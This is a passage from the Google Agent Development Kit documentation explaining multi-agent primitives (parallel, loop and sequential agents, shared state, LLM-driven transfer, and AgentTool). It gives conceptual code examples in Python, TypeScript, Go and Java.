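        "InfoGatherer",
        [("WeatherFetcher", "weather"), ("NewsFetcher", "news")],
        state,
    )
)
print(branches)
print(state)
```

Because each worker writes only to its own key, the final dictionary is the same no matter how the workers interleave.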
```python
# Conceptual Example: Parallel Execution
from google.adk.agents import ParallelAgent, LlmAgent

fetch_weather = LlmAgent(name="WeatherFetcher", output_key="weather")
fetch_news = LlmAgent(name="NewsFetcher", output_key="news")

gatherer = ParallelAgent(name="InfoGatherer", sub_agents=[fetch_weather, fetch_news])
# When gatherer runs, WeatherFetcher and NewsFetcher run concurrently.
# A subsequent agent could read state['weather'] and state['news'].
```

```typescript
// Conceptual Example: Parallel Execution
import { ParallelAgent, LlmAgent } from '@google/adk';

const fetchWeather = new LlmAgent({name: 'WeatherFetcher', outputKey: 'weather'});
const fetchNews = new LlmAgent({name: 'NewsFetcher', outputKey: 'news'});

const gatherer = new ParallelAgent({name: 'InfoGatherer', subAgents: [fetchWeather, fetchNews]});
// When gatherer runs, WeatherFetcher and NewsFetcher run concurrently.
// A subsequent agent could read state['weather'] and state['news'].
```

```go
import (
	"google.golang.org/adk/agent"
	"google.golang.org/adk/agent/llmagent"
	"google.golang.org/adk/agent/workflowagents/parallelagent"
)

// Conceptual Example: Parallel Execution
fetchWeather, _ := llmagent.New(llmagent.Config{Name: "WeatherFetcher", OutputKey: "weather", Model: m})
fetchNews, _ := llmagent.New(llmagent.Config{Name: "NewsFetcher", OutputKey: "news", Model: m})

gatherer, _ := parallelagent.New(parallelagent.Config{
	AgentConfig: agent.Config{Name: "InfoGatherer", SubAgents: []agent.Agent{fetchWeather, fetchNews}},
})
// When gatherer runs, WeatherFetcher and NewsFetcher run concurrently.
// A subsequent agent could read state["weather"] and state["news"].
```

```java
// Conceptual Example: Parallel Execution
import com.google.adk.agents.LlmAgent;
import com.google.adk.agents.ParallelAgent;

LlmAgent fetchWeather = LlmAgent.builder()
    .name("WeatherFetcher")
    .outputKey("weather")
    .build();

LlmAgent fetchNews = LlmAgent.builder()
    .name("NewsFetcher")
    .outputKey("news")
    .build();

ParallelAgent gatherer = ParallelAgent.builder()
    .name("InfoGatherer")
    .subAgents(fetchWeather, fetchNews)
    .build();

// When gatherer runs, WeatherFetcher and NewsFetcher run concurrently.
// A subsequent agent could read state.get("weather") and state.get("news").
```

- **[`LoopAgent`](https://google.github.io/adk-docs/agents/workflow-agents/loop-agents/index.md):** Executes its `sub_agents` sequentially in a loop.
    - **Termination:** The loop stops if the optional `max_iterations` is reached, or if any sub-agent returns an [`Event`](https://google.github.io/adk-docs/events/index.md) with `escalate=True` in its Event Actions.
    - **Context & State:** Passes the *same* `InvocationContext` in each iteration, allowing state changes (e.g., counters, flags) to persist across loops.
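
The two termination rules above can be sketched in plain Python, independent of ADK. Everything here is a hypothetical model: `FakeEvent`, `run_loop`, `process_step`, and `checker` are illustrative names, and the sketch assumes the loop stops as soon as an escalating event is seen, which may not match every detail of the real `LoopAgent`.

```python
from dataclasses import dataclass
from typing import Callable, List, Optional


@dataclass
class FakeEvent:
    """Hypothetical stand-in for an ADK Event; only the escalate flag is modeled."""
    author: str
    escalate: bool = False


def run_loop(
    sub_agents: List[Callable[[dict], FakeEvent]],
    state: dict,
    max_iterations: Optional[int] = None,
) -> int:
    """Run sub-agents in order, repeatedly, until one escalates or the cap is hit.

    Returns the number of iterations that were started.
    """
    iterations = 0
    while max_iterations is None or iterations < max_iterations:
        iterations += 1
        for agent in sub_agents:
            event = agent(state)  # every agent sees the same shared state
            if event.escalate:
                return iterations
    return iterations


def process_step(state: dict) -> FakeEvent:
    """Pretend work: marks the job completed on the third pass."""
    state["count"] = state.get("count", 0) + 1
    if state["count"] >= 3:
        state["status"] = "completed"
    return FakeEvent(author="ProcessingStep")


def checker(state: dict) -> FakeEvent:
    """Escalates once state['status'] is 'completed'."""
    return FakeEvent(author="Checker", escalate=state.get("status") == "completed")


state: dict = {}
iterations = run_loop([process_step, checker], state, max_iterations=10)
print(iterations, state)

# With nothing ever setting the status, only the iteration cap stops the loop.
capped = run_loop([checker], {}, max_iterations=2)
print(capped)
```

The counter in `state` survives from one iteration to the next, which is the same property the "Context & State" bullet describes for the real agent.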
```python
# Conceptual Example: Loop with Condition
from google.adk.agents import LoopAgent, LlmAgent, BaseAgent
from google.adk.events import Event, EventActions
from google.adk.agents.invocation_context import InvocationContext
from typing import AsyncGenerator

class CheckCondition(BaseAgent): # Custom agent to check state
    async def _run_async_impl(self, ctx: InvocationContext) -> AsyncGenerator[Event, None]:
        status = ctx.session.state.get("status", "pending")
        is_done = (status == "completed")
        yield Event(author=self.name, actions=EventActions(escalate=is_done)) # Escalate if done

process_step = LlmAgent(name="ProcessingStep") # Agent that might update state['status']

poller = LoopAgent(
    name="StatusPoller",
    max_iterations=10,
    sub_agents=[process_step, CheckCondition(name="Checker")]
)
# When poller runs, it executes process_step then Checker repeatedly
# until Checker escalates (state['status'] == 'completed') or 10 iterations pass.
```

```typescript
// Conceptual Example: Loop with Condition
import { LoopAgent, LlmAgent, BaseAgent, InvocationContext, createEvent, createEventActions } from '@google/adk';
import type { Event, EventActions } from '@google/adk';

class CheckConditionAgent extends BaseAgent { // Custom agent to check state
    async *runAsyncImpl(ctx: InvocationContext): AsyncGenerator<Event, void, void> {
        const status = ctx.session.state['status'] || 'pending';
        const isDone = status === 'completed';
        yield createEvent({ author: 'check_condition', actions: createEventActions({ escalate: isDone }) });
    }

    async *runLiveImpl(ctx: InvocationContext): AsyncGenerator<Event, void, void> {
        // This is not implemented.
  }
};

const processStep = new LlmAgent({name: 'ProcessingStep'}); // Agent that might update state['status']

const poller = new LoopAgent({
  name: 'StatusPoller',
  maxIterations: 10,
  // Executes its sub_agents sequentially in a loop
  subAgents: [processStep, new CheckConditionAgent({name: 'Checker'})]
});
// When poller runs, it executes processStep then Checker repeatedly
// until Checker escalates (state['status'] === 'completed') or 10 iterations pass.
```

```go
import (
    "iter"

    "google.golang.org/adk/agent"
    "google.golang.org/adk/agent/llmagent"
    "google.golang.org/adk/agent/workflowagents/loopagent"
    "google.golang.org/adk/session"
)

// Conceptual Example: Loop with Condition
// Custom agent to check state
checkCondition, _ := agent.New(agent.Config{
    Name: "Checker",
    Run: func(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] {
        return func(yield func(*session.Event, error) bool) {
            status, err := ctx.Session().State().Get("status")
            // If "status" is not in the state, default to "pending".
            // This is idiomatic Go for handling a potential error on lookup.
            if err != nil {
                status = "pending"
            }
            isDone := status == "completed"
            yield(&session.Event{Author: "Checker", Actions: session.EventActions{Escalate: isDone}}, nil)
        }
    },
})

processStep, _ := llmagent.New(llmagent.Config{Name: "ProcessingStep", Model: m}) // Agent that might update state["status"]

poller, _ := loopagent.New(loopagent.Config{
    MaxIterations: 10,
    AgentConfig:   agent.Config{Name: "StatusPoller", SubAgents: []agent.Agent{processStep, checkCondition}},
})
// When poller runs, it executes processStep then Checker repeatedly
// until Checker escalates (state["status"] == "completed") or 10 iterations pass.
```

```java
// Conceptual Example: Loop with Condition
// Custom agent to check state and potentially escalate
public static class CheckConditionAgent extends BaseAgent {
  public CheckConditionAgent(String name, String description) {
    super(name, description, List.of(), null, null);
  }

  @Override
  protected Flowable runAsyncImpl(InvocationContext ctx) {
    String status = (String) ctx.session().state().getOrDefault("status", "pending");
    boolean isDone = "completed".equalsIgnoreCase(status);

    // Emit an event that signals to escalate (exit the loop) if the condition is met.
    // If not done, the escalate flag will be false or absent, and the loop continues.
    Event checkEvent = Event.builder()
        .author(name())
        .id(Event.generateEventId()) // Important to give events unique IDs
        .actions(EventActions.builder().escalate(isDone).build()) // Escalate if done
        .build();
    return Flowable.just(checkEvent);
  }
}

// Agent that might update state.put("status")
LlmAgent processingStepAgent = LlmAgent.builder().name("ProcessingStep").build();
// Custom agent instance for checking the condition
CheckConditionAgent conditionCheckerAgent = new CheckConditionAgent(
    "ConditionChecker",
    "Checks if the status is 'completed'."
);
LoopAgent poller = LoopAgent.builder()
    .name("StatusPoller")
    .maxIterations(10)
    .subAgents(processingStepAgent, conditionCheckerAgent)
    .build();
// When poller runs, it executes processingStepAgent then conditionCheckerAgent repeatedly
// until Checker escalates (state.get("status") == "completed") or 10 iterations pass.
```

### 1.3. Interaction & Communication Mechanisms

Agents within a system often need to exchange data or trigger actions in one another. ADK facilitates this through:

#### a) Shared Session State (`session.state`)

The most fundamental way for agents operating within the same invocation (and thus sharing the same [`Session`](/adk-docs/sessions/session/) object via the `InvocationContext`) to communicate passively.

- **Mechanism:** One agent (or its tool/callback) writes a value (`context.state['data_key'] = processed_data`), and a subsequent agent reads it (`data = context.state.get('data_key')`). State changes are tracked via [`CallbackContext`](https://google.github.io/adk-docs/callbacks/index.md).
- **Convenience:** The `output_key` property on [`LlmAgent`](https://google.github.io/adk-docs/agents/llm-agents/index.md) automatically saves the agent's final response text (or structured output) to the specified state key.
- **Nature:** Asynchronous, passive communication. Ideal for pipelines orchestrated by `SequentialAgent` or passing data across `LoopAgent` iterations.
- **See Also:** [State Management](https://google.github.io/adk-docs/sessions/state/index.md)

**Invocation Context and `temp:` State**

When a parent agent invokes a sub-agent, it passes the same `InvocationContext`. This means they share the same temporary (`temp:`) state, which is ideal for passing data that is only relevant for the current turn.

```python
# Conceptual Example: Using output_key and reading state
from google.adk.agents import LlmAgent, SequentialAgent

agent_A = LlmAgent(name="AgentA", instruction="Find the capital of France.", output_key="capital_city")
agent_B = LlmAgent(name="AgentB", instruction="Tell me about the city stored in {capital_city}.")

pipeline = SequentialAgent(name="CityInfo", sub_agents=[agent_A, agent_B])
# AgentA runs, saves "Paris" to state['capital_city'].
# AgentB runs, its instruction processor reads state['capital_city'] to get "Paris".
```

```typescript
// Conceptual Example: Using outputKey and reading state
import { LlmAgent, SequentialAgent } from '@google/adk';

const agentA = new LlmAgent({name: 'AgentA', instruction: 'Find the capital of France.', outputKey: 'capital_city'});
const agentB = new LlmAgent({name: 'AgentB', instruction: 'Tell me about the city stored in {capital_city}.'});

const pipeline = new SequentialAgent({name: 'CityInfo', subAgents: [agentA, agentB]});
// AgentA runs, saves "Paris" to state['capital_city'].
// AgentB runs, its instruction processor reads state['capital_city'] to get "Paris".
```

```go
import (
    "google.golang.org/adk/agent"
    "google.golang.org/adk/agent/llmagent"
    "google.golang.org/adk/agent/workflowagents/sequentialagent"
)

// Conceptual Example: Using OutputKey and reading state
agentA, _ := llmagent.New(llmagent.Config{Name: "AgentA", Instruction: "Find the capital of France.", OutputKey: "capital_city", Model: m})
agentB, _ := llmagent.New(llmagent.Config{Name: "AgentB", Instruction: "Tell me about the city stored in {capital_city}.", Model: m})

pipeline2, _ := sequentialagent.New(sequentialagent.Config{
    AgentConfig: agent.Config{Name: "CityInfo", SubAgents: []agent.Agent{agentA, agentB}},
})
// AgentA runs, saves "Paris" to state["capital_city"].
// AgentB runs, its instruction processor reads state["capital_city"] to get "Paris".
```

```java
// Conceptual Example: Using outputKey and reading state
import com.google.adk.agents.LlmAgent;
import com.google.adk.agents.SequentialAgent;

LlmAgent agentA = LlmAgent.builder()
    .name("AgentA")
    .instruction("Find the capital of France.")
    .outputKey("capital_city")
    .build();

// AgentB only reads the key, so it sets no outputKey (which would overwrite AgentA's value).
LlmAgent agentB = LlmAgent.builder()
    .name("AgentB")
    .instruction("Tell me about the city stored in {capital_city}.")
    .build();

SequentialAgent pipeline = SequentialAgent.builder().name("CityInfo").subAgents(agentA, agentB).build();
// AgentA runs, saves "Paris" to state under the key "capital_city".
// AgentB runs, its instruction processor reads state.get("capital_city") to get "Paris".
```

#### b) LLM-Driven Delegation (Agent Transfer)

Leverages an [`LlmAgent`](https://google.github.io/adk-docs/agents/llm-agents/index.md)'s understanding to dynamically route tasks to other suitable agents within the hierarchy.

- **Mechanism:** The agent's LLM generates a specific function call: `transfer_to_agent(agent_name='target_agent_name')`.
- **Handling:** The `AutoFlow`, used by default when sub-agents are present or transfer isn't disallowed, intercepts this call. It identifies the target agent using `root_agent.find_agent()` and updates the `InvocationContext` to switch execution focus.
- **Requires:** The calling `LlmAgent` needs a clear `instruction` on when to transfer, and potential target agents need distinct `description`s for the LLM to make informed decisions. Transfer scope (parent, sub-agent, siblings) can be configured on the `LlmAgent`.
- **Nature:** Dynamic, flexible routing based on LLM interpretation.

```python
# Conceptual Setup: LLM Transfer
from google.adk.agents import LlmAgent

booking_agent = LlmAgent(name="Booker", description="Handles flight and hotel bookings.")
info_agent = LlmAgent(name="Info", description="Provides general information and answers questions.")

coordinator = LlmAgent(
    name="Coordinator",
    model="gemini-2.0-flash",
    instruction="You are an assistant. Delegate booking tasks to Booker and info requests to Info.",
    description="Main coordinator.",
    # AutoFlow is typically used implicitly here
    sub_agents=[booking_agent, info_agent]
)
# If coordinator receives "Book a flight", its LLM should generate:
# FunctionCall(name='transfer_to_agent', args={'agent_name': 'Booker'})
# ADK framework then routes execution to booking_agent.
```

```typescript
// Conceptual Setup: LLM Transfer
import { LlmAgent } from '@google/adk';

const bookingAgent = new LlmAgent({name: 'Booker', description: 'Handles flight and hotel bookings.'});
const infoAgent = new LlmAgent({name: 'Info', description: 'Provides general information and answers questions.'});

const coordinator = new LlmAgent({
  name: 'Coordinator',
  model: 'gemini-2.5-flash',
  instruction: 'You are an assistant. Delegate booking tasks to Booker and info requests to Info.',
  description: 'Main coordinator.',
  // AutoFlow is typically used implicitly here
  subAgents: [bookingAgent, infoAgent]
});
// If coordinator receives "Book a flight", its LLM should generate:
// {functionCall: {name: 'transfer_to_agent', args: {agent_name: 'Booker'}}}
// ADK framework then routes execution to bookingAgent.
```

```go
import (
    "google.golang.org/adk/agent" // needed for agent.Agent below
    "google.golang.org/adk/agent/llmagent"
)

// Conceptual Setup: LLM Transfer
bookingAgent, _ := llmagent.New(llmagent.Config{Name: "Booker", Description: "Handles flight and hotel bookings.", Model: m})
infoAgent, _ := llmagent.New(llmagent.Config{Name: "Info", Description: "Provides general information and answers questions.", Model: m})

coordinator, _ := llmagent.New(llmagent.Config{
    Name:        "Coordinator",
    Model:       m,
    Instruction: "You are an assistant. Delegate booking tasks to Booker and info requests to Info.",
    Description: "Main coordinator.",
    SubAgents:   []agent.Agent{bookingAgent, infoAgent},
})
// If coordinator receives "Book a flight", its LLM should generate:
// FunctionCall{Name: "transfer_to_agent", Args: map[string]any{"agent_name": "Booker"}}
// ADK framework then routes execution to bookingAgent.
```

```java
// Conceptual Setup: LLM Transfer
import com.google.adk.agents.LlmAgent;

LlmAgent bookingAgent = LlmAgent.builder()
    .name("Booker")
    .description("Handles flight and hotel bookings.")
    .build();

LlmAgent infoAgent = LlmAgent.builder()
    .name("Info")
    .description("Provides general information and answers questions.")
    .build();

// Define the coordinator agent
LlmAgent coordinator = LlmAgent.builder()
    .name("Coordinator")
    .model("gemini-2.0-flash") // Or your desired model
    .instruction("You are an assistant. Delegate booking tasks to Booker and info requests to Info.")
    .description("Main coordinator.")
    // AutoFlow will be used by default (implicitly) because subAgents are present
    // and transfer is not disallowed.
    .subAgents(bookingAgent, infoAgent)
    .build();

// If coordinator receives "Book a flight", its LLM should generate:
// FunctionCall.builder().name("transferToAgent").args(ImmutableMap.of("agent_name", "Booker")).build()
// ADK framework then routes execution to bookingAgent.
```

#### c) Explicit Invocation (`AgentTool`)

Allows an [`LlmAgent`](https://google.github.io/adk-docs/agents/llm-agents/index.md) to treat another `BaseAgent` instance as a callable function or [Tool](/adk-docs/tools-custom/).

- **Mechanism:** Wrap the target agent instance in `AgentTool` and include it in the parent `LlmAgent`'s `tools` list. `AgentTool` generates a corresponding function declaration for the LLM.
- **Handling:** When the parent LLM generates a function call targeting the `AgentTool`, the framework executes `AgentTool.run_async`. This method runs the target agent, captures its final response, forwards any state/artifact changes back to the parent's context, and returns the response as the tool's result.
- **Nature:** Synchronous (within the parent's flow), explicit, controlled invocation like any other tool.
- **Note:** `AgentTool` must be imported and used explicitly.

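The handling steps above can be illustrated without the framework. The sketch below is plain Python and deliberately does not use the ADK classes: `EchoAgent`, `SimpleAgentTool`, and their methods are hypothetical names. It models only the three behaviors described: run the wrapped agent, forward its state changes to the caller, and return its final response as the tool result.

```python
import asyncio


class EchoAgent:
    """Hypothetical child agent: records a state change and returns text."""
    name = "Echo"
    description = "Repeats the request in upper case."

    async def run(self, request: str, state: dict) -> str:
        state["last_request"] = request  # state change made by the child
        return request.upper()


class SimpleAgentTool:
    """Hypothetical wrapper that exposes an agent as a callable tool."""

    def __init__(self, agent):
        self.agent = agent

    def declaration(self) -> dict:
        # What a parent LLM would see when deciding which tool to call.
        return {"name": self.agent.name, "description": self.agent.description}

    async def run_async(self, args: dict, parent_state: dict) -> str:
        child_state = dict(parent_state)  # the child works on a copy
        result = await self.agent.run(args["request"], child_state)
        parent_state.update(child_state)  # forward the child's changes to the parent
        return result  # the final response becomes the tool result


parent_state = {"user": "alice"}
tool = SimpleAgentTool(EchoAgent())
result = asyncio.run(tool.run_async({"request": "draw a cat"}, parent_state))
print(result, parent_state)
```

The parent awaits the tool call and continues only once the child has finished, which is why this style of invocation is described as synchronous within the parent's flow.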
```python
# Conceptual Setup: Agent as a Tool
from google.adk.agents import LlmAgent, BaseAgent
from google.adk.events import Event
from google.adk.tools import agent_tool
from google.genai import types

# Define a target agent (could be LlmAgent or custom BaseAgent)
class ImageGeneratorAgent(BaseAgent): # Example custom agent
    name: str = "ImageGen"
    description: str = "Generates an image based on a prompt."
    # ... internal logic ...
    async def _run_async_impl(self, ctx): # Simplified run logic
        prompt = ctx.session.state.get("image_prompt", "default prompt")
        # ... generate image bytes ...
        image_bytes = b"..."
        # Part.from_bytes takes keyword arguments
        yield Event(author=self.name, content=types.Content(parts=[types.Part.from_bytes(data=image_bytes, mime_type="image/png")]))

image_agent = ImageGeneratorAgent()
image_tool = agent_tool.AgentTool(agent=image_agent) # Wrap the agent

# Parent agent uses the AgentTool
artist_agent = LlmAgent(
    name="Artist",
    model="gemini-2.0-flash",
    instruction="Create a prompt and use the ImageGen tool to generate the image.",
    tools=[image_tool] # Include the AgentTool
)
# Artist LLM generates a prompt, then calls:
# FunctionCall(name='ImageGen', args={'image_prompt': 'a cat wearing a hat'})
# Framework calls image_tool.run_async(...), which runs ImageGeneratorAgent.
# The resulting image Part is returned to the Artist agent as the tool result.
```

```typescript
// Conceptual Setup: Agent as a Tool
// createEvent is called below, so it is imported as a value rather than a type.
import { LlmAgent, BaseAgent, AgentTool, InvocationContext, createEvent } from '@google/adk';
import type { Part } from '@google/genai';

// Define a target agent (could be LlmAgent or custom BaseAgent)
class ImageGeneratorAgent extends BaseAgent { // Example custom agent
  constructor() {
    super({name: 'ImageGen', description: 'Generates an image based on a prompt.'});
  }

  // ... internal logic ...
  async *runAsyncImpl(ctx: InvocationContext): AsyncGenerator { // Simplified run logic
    const prompt = ctx.session.state['image_prompt'] || 'default prompt';
    // ... generate image bytes ...
    const imageBytes = new Uint8Array(); // placeholder
    const imagePart: Part = {inlineData: {data: Buffer.from(imageBytes).toString('base64'), mimeType: 'image/png'}};
    yield createEvent({content: {parts: [imagePart]}});
  }

  async *runLiveImpl(ctx: InvocationContext): AsyncGenerator {
    // Not implemented for this agent.
  }
}

const imageAgent = new ImageGeneratorAgent();
const imageTool = new AgentTool({agent: imageAgent}); // Wrap the agent

// Parent agent uses the AgentTool
const artistAgent = new LlmAgent({
  name: 'Artist',
  model: 'gemini-2.5-flash',
  instruction: 'Create a prompt and use the ImageGen tool to generate the image.',
  tools: [imageTool] // Include the AgentTool
});
// Artist LLM generates a prompt, then calls:
// {functionCall: {name: 'ImageGen', args: {image_prompt: 'a cat wearing a hat'}}}
// Framework calls imageTool.runAsync(...), which runs ImageGeneratorAgent.
// The resulting image Part is returned to the Artist agent as the tool result.
```

```go
import (
    "fmt"
    "iter"

    "google.golang.org/adk/agent"
    "google.golang.org/adk/agent/llmagent"
    "google.golang.org/adk/model"
    "google.golang.org/adk/session"
    "google.golang.org/adk/tool"
    "google.golang.org/adk/tool/agenttool"
    "google.golang.org/genai"
)

// Conceptual Setup: Agent as a Tool
// Define a target agent (could be LlmAgent or custom BaseAgent)
imageAgent, _ := agent.New(agent.Config{
    Name:        "ImageGen",
    Description: "Generates an image based on a prompt.",
    Run: func(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] {
        return func(yield func(*session.Event, error) bool) {
            prompt, _ := ctx.Session().State().Get("image_prompt")
            fmt.Printf("Generating image for prompt: %v\n", prompt)
            imageBytes := []byte("...") // Simulate image bytes
            yield(&session.Event{
                Author: "ImageGen",
                LLMResponse: model.LLMResponse{
                    Content: &genai.Content{
                        Parts: []*genai.Part{genai.NewPartFromBytes(imageBytes, "image/png")},
                    },
                },
            }, nil)
        }
    },
})

// Wrap the agent
imageTool := agenttool.New(imageAgent, nil)
// Now imageTool
// can be used as a tool by other agents.

// Parent agent uses the AgentTool
artistAgent, _ := llmagent.New(llmagent.Config{
    Name:        "Artist",
    Model:       m,
    Instruction: "Create a prompt and use the ImageGen tool to generate the image.",
    Tools:       []tool.Tool{imageTool}, // Include the AgentTool
})
// Artist LLM generates a prompt, then calls:
// FunctionCall{Name: "ImageGen", Args: map[string]any{"image_prompt": "a cat wearing a hat"}}
// Framework calls imageTool.Run(...), which runs ImageGeneratorAgent.
// The resulting image Part is returned to the Artist agent as the tool result.
```

```java
// Conceptual Setup: Agent as a Tool
import com.google.adk.agents.BaseAgent;
import com.google.adk.agents.LlmAgent;
import com.google.adk.tools.AgentTool;

// Example custom agent (could be LlmAgent or custom BaseAgent)
public class ImageGeneratorAgent extends BaseAgent {

  public ImageGeneratorAgent(String name, String description) {
    super(name, description, List.of(), null, null);
  }

  // ... internal logic ...
  @Override
  protected Flowable runAsyncImpl(InvocationContext invocationContext) { // Simplified run logic
    invocationContext.session().state().get("image_prompt");
    // Generate image bytes
    // ...

    Event responseEvent = Event.builder()
        .author(this.name())
        .content(Content.fromParts(Part.fromText("...")))
        .build();
    return Flowable.just(responseEvent);
  }

  @Override
  protected Flowable runLiveImpl(InvocationContext invocationContext) {
    return null;
  }
}

// Wrap the agent using AgentTool
ImageGeneratorAgent imageAgent = new ImageGeneratorAgent("image_agent", "generates images");
AgentTool imageTool = AgentTool.create(imageAgent);

// Parent agent uses the AgentTool
LlmAgent artistAgent = LlmAgent.builder()
    .name("Artist")
    .model("gemini-2.0-flash")
    .instruction(
        "You are an artist. Create a detailed prompt for an image and then "
            + "use the 'ImageGen' tool to generate the image. "
            + "The 'ImageGen' tool expects a single string argument named 'request' "
            + "containing the image prompt. 
The tool will return a JSON string in its "
            + "'result' field, containing 'image_base64', 'mime_type', and 'status'."
    )
    .description("An agent that can create images using a generation tool.")
    .tools(imageTool) // Include the AgentTool
    .build();

// Artist LLM generates a prompt, then calls:
// FunctionCall(name='ImageGen', args={'imagePrompt': 'a cat wearing a hat'})
// Framework calls imageTool.runAsync(...), which runs ImageGeneratorAgent.
// The resulting image Part is returned to the Artist agent as the tool result.
```

These primitives provide the flexibility to design multi-agent interactions ranging from tightly coupled sequential workflows to dynamic, LLM-driven delegation networks.

## 2. Common Multi-Agent Patterns using ADK Primitives

By combining ADK's composition primitives, you can implement various established patterns for multi-agent collaboration.

### Coordinator/Dispatcher Pattern

- **Structure:** A central [`LlmAgent`](https://google.github.io/adk-docs/agents/llm-agents/index.md) (Coordinator) manages several specialized `sub_agents`.
- **Goal:** Route incoming requests to the appropriate specialist agent.
- **ADK Primitives Used:**
    - **Hierarchy:** Coordinator has specialists listed in `sub_agents`.
    - **Interaction:** Primarily uses **LLM-Driven Delegation** (requires clear `description`s on sub-agents and appropriate `instruction` on Coordinator) or **Explicit Invocation (`AgentTool`)** (Coordinator includes `AgentTool`-wrapped specialists in its `tools`).

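The routing flow behind this pattern (the coordinator emits a transfer call, the target is looked up by name, execution moves to it) can be sketched in plain Python. Nothing here is the ADK API: `Agent`, `find_agent`, `fake_llm_route`, and the `keywords` field are hypothetical, and a keyword match stands in for the LLM's decision, which in practice is driven by each sub-agent's `description`.

```python
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Agent:
    """Hypothetical agent record; keywords replace real LLM reasoning."""
    name: str
    description: str
    keywords: tuple = ()
    sub_agents: list = field(default_factory=list)


def find_agent(root: Agent, name: str) -> Optional[Agent]:
    """Depth-first lookup of an agent by name in the hierarchy."""
    if root.name == name:
        return root
    for child in root.sub_agents:
        found = find_agent(child, name)
        if found is not None:
            return found
    return None


def fake_llm_route(coordinator: Agent, message: str) -> dict:
    """Stand-in for the LLM: emit a transfer call for the first keyword match."""
    text = message.lower()
    for child in coordinator.sub_agents:
        if any(word in text for word in child.keywords):
            return {"name": "transfer_to_agent", "args": {"agent_name": child.name}}
    # No specialist matched: stay with the coordinator itself.
    return {"name": "transfer_to_agent", "args": {"agent_name": coordinator.name}}


def dispatch(coordinator: Agent, message: str) -> str:
    """Resolve the transfer call to a concrete agent and return its name."""
    call = fake_llm_route(coordinator, message)
    target = find_agent(coordinator, call["args"]["agent_name"])
    return target.name


billing = Agent("Billing", "Handles billing inquiries.", keywords=("payment", "invoice"))
support = Agent("Support", "Handles technical support requests.", keywords=("log in", "error"))
coordinator = Agent("HelpDeskCoordinator", "Main help desk router.", sub_agents=[billing, support])

print(dispatch(coordinator, "My payment failed"))
print(dispatch(coordinator, "I can't log in"))
```

The sketch also shows why distinct descriptions matter: if two specialists matched the same request, the router would have no principled way to choose between them.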
```python
# Conceptual Code: Coordinator using LLM Transfer
from google.adk.agents import LlmAgent

billing_agent = LlmAgent(name="Billing", description="Handles billing inquiries.")
support_agent = LlmAgent(name="Support", description="Handles technical support requests.")

coordinator = LlmAgent(
    name="HelpDeskCoordinator",
    model="gemini-2.0-flash",
    instruction="Route user requests: Use Billing agent for payment issues, Support agent for technical problems.",
    description="Main help desk router.",
    # allow_transfer=True is often implicit with sub_agents in AutoFlow
    sub_agents=[billing_agent, support_agent]
)
# User asks "My payment failed" -> Coordinator's LLM should call transfer_to_agent(agent_name='Billing')
# User asks "I can't log in" -> Coordinator's LLM should call transfer_to_agent(agent_name='Support')
```

```typescript
// Conceptual Code: Coordinator using LLM Transfer
import { LlmAgent } from '@google/adk';

const billingAgent = new LlmAgent({name: 'Billing', description: 'Handles billing inquiries.'});
const supportAgent = new LlmAgent({name: 'Support', description: 'Handles technical support requests.'});

const coordinator = new LlmAgent({
  name: 'HelpDeskCoordinator',
  model: 'gemini-2.5-flash',
  instruction: 'Route user requests: Use Billing agent for payment issues, Support agent for technical problems.',
  description: 'Main help desk router.',
  // allowTransfer=true is often implicit with subAgents in AutoFlow
  subAgents: [billingAgent, supportAgent]
});
// User asks "My payment failed" -> Coordinator's LLM should call {functionCall: {name: 'transfer_to_agent', args: {agent_name: 'Billing'}}}
// User asks "I can't log in" -> Coordinator's LLM should call {functionCall: {name: 'transfer_to_agent', args: {agent_name: 'Support'}}}
```

```go
import (
    "google.golang.org/adk/agent"
    "google.golang.org/adk/agent/llmagent"
)

// Conceptual Code: Coordinator using LLM Transfer
billingAgent, _ := llmagent.New(llmagent.Config{Name: "Billing", Description: "Handles 
billing inquiries.", Model: m})
supportAgent, _ := llmagent.New(llmagent.Config{Name: "Support", Description: "Handles technical support requests.", Model: m})

coordinator, _ := llmagent.New(llmagent.Config{
    Name:        "HelpDeskCoordinator",
    Model:       m,
    Instruction: "Route user requests: Use Billing agent for payment issues, Support agent for technical problems.",
    Description: "Main help desk router.",
    SubAgents:   []agent.Agent{billingAgent, supportAgent},
})
// User asks "My payment failed" -> Coordinator's LLM should call transfer_to_agent(agent_name='Billing')
// User asks "I can't log in" -> Coordinator's LLM should call transfer_to_agent(agent_name='Support')
```

```java
// Conceptual Code: Coordinator using LLM Transfer
import com.google.adk.agents.LlmAgent;

LlmAgent billingAgent = LlmAgent.builder()
    .name("Billing")
    .description("Handles billing inquiries and payment issues.")
    .build();

LlmAgent supportAgent = LlmAgent.builder()
    .name("Support")
    .description("Handles technical support requests and login problems.")
    .build();

LlmAgent coordinator = LlmAgent.builder()
    .name("HelpDeskCoordinator")
    .model("gemini-2.0-flash")
    .instruction("Route user requests: Use Billing agent for payment issues, Support agent for technical problems.")
    .description("Main help desk router.")
    .subAgents(billingAgent, supportAgent)
    // Agent transfer is implicit with sub agents in the AutoFlow, unless specified
    // using .disallowTransferToParent or disallowTransferToPeers
    .build();

// User asks "My payment failed" -> Coordinator's LLM should call
// transferToAgent(agentName='Billing')
// User asks "I can't log in" -> Coordinator's LLM should call
// transferToAgent(agentName='Support')
```

### Sequential Pipeline Pattern

- **Structure:** A [`SequentialAgent`](https://google.github.io/adk-docs/agents/workflow-agents/sequential-agents/index.md) contains `sub_agents` executed in a fixed order.
- **Goal:** Implement a multistep process where the output of one step feeds into the next.
- **ADK Primitives Used:**
    - **Workflow:** `SequentialAgent` defines the order.
    - **Communication:** Primarily uses **Shared Session State**. Earlier agents write results (often via `output_key`); later agents read those results from `context.state`.

```python
# Conceptual Code: Sequential Data Pipeline
from google.adk.agents import SequentialAgent, LlmAgent

validator = LlmAgent(name="ValidateInput", instruction="Validate the input.", output_key="validation_status")
processor = LlmAgent(name="ProcessData", instruction="Process data if {validation_status} is 'valid'.", output_key="result")
reporter = LlmAgent(name="ReportResult", instruction="Report the result from {result}.")

data_pipeline = SequentialAgent(
    name="DataPipeline",
    sub_agents=[validator, processor, reporter]
)
# validator runs -> saves to state['validation_status']
# processor runs -> reads state['validation_status'], saves to state['result']
# reporter runs -> reads state['result']
```

```typescript
// Conceptual Code: Sequential Data Pipeline
import { SequentialAgent, LlmAgent } from '@google/adk';

const validator = new LlmAgent({name: 'ValidateInput', instruction: 'Validate the input.', outputKey: 'validation_status'});
const processor = new LlmAgent({name: 'ProcessData', instruction: 'Process data if {validation_status} is "valid".', outputKey: 'result'});
